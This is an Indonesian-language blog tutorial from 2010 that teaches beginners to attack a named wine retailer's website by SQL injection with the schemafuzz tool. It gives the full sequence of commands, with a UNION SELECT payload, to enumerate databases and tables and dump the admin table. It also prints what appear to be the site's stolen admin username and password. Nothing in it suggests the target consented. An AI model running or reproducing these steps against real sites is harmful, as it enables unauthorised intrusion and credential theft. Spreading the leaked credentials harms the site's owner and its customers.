Selasa, 07 September 2010

Hacking Dengan Menggunakan Sql Injection

Khusus buat Para Newbie Yang pengen belajar,,, jadi buat para master yang udah jago di liat2 aja dech….
Mungkin masih banyak kekurangan dalam Thread ini, untuk itu ayo kita sama sama belajar…
Schemafuzz adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website…
caranya :
klik start>>Run>>CMD
truss and aktif ke directory c:\ dengan mengetik CD ../.. <– mundur 2 dir
masuk ke directory Python26 dengan cara ketik “cd Python26″ hingga muncul
C:\Python26>
perintah dasar schemafuzz ini yaitu :
schemafuzz.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :
http://www.queenannewine.com/products.php?cat=1
2. Cek kolomnya
python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol
setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <– di sini ada hasil column yang berhasil di cari tadi….
3. Cari Db nya..
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ -dbs
Kita sudah temukan data base site tersebut :
database ada 3 :
1. ‑‑C239128_QAWcal‑
2. ‑‑C239128_queen‑
3. C239128_queen2‑
tapi pada penjesalan ini kita akan gunakan database nomor2
4. Cari nama table dalam database C239128_queen
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –schema -D C239128_queen
keluar semua colomnya… dari sini kita mengetahui bahwa web tersebut memiliki 56 Columns. (pic di atas pencarian Blom selesai, jadi kalian kalian harus selesaikan sampai column 56) Sekarang kita tinggal pilih kolom yang akan kita exploit ….
5. Exploit Tables and Columns :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T – di isi Nama table -C di isi nama columns..
Misal gua mau Melihat data data yang ada di columns admin :
Dengan perintah :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T admin -C adminUser,adminPassword
Lihat
jbalji:mcse6273:mcse6273:
ini adalah user dan password admin yang keluar.. . Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, Harus Manual.
ok…..
mungkin sekian dulu tutorial ini semoga bermanfaat….

Tidak ada komentar:

Posting Komentar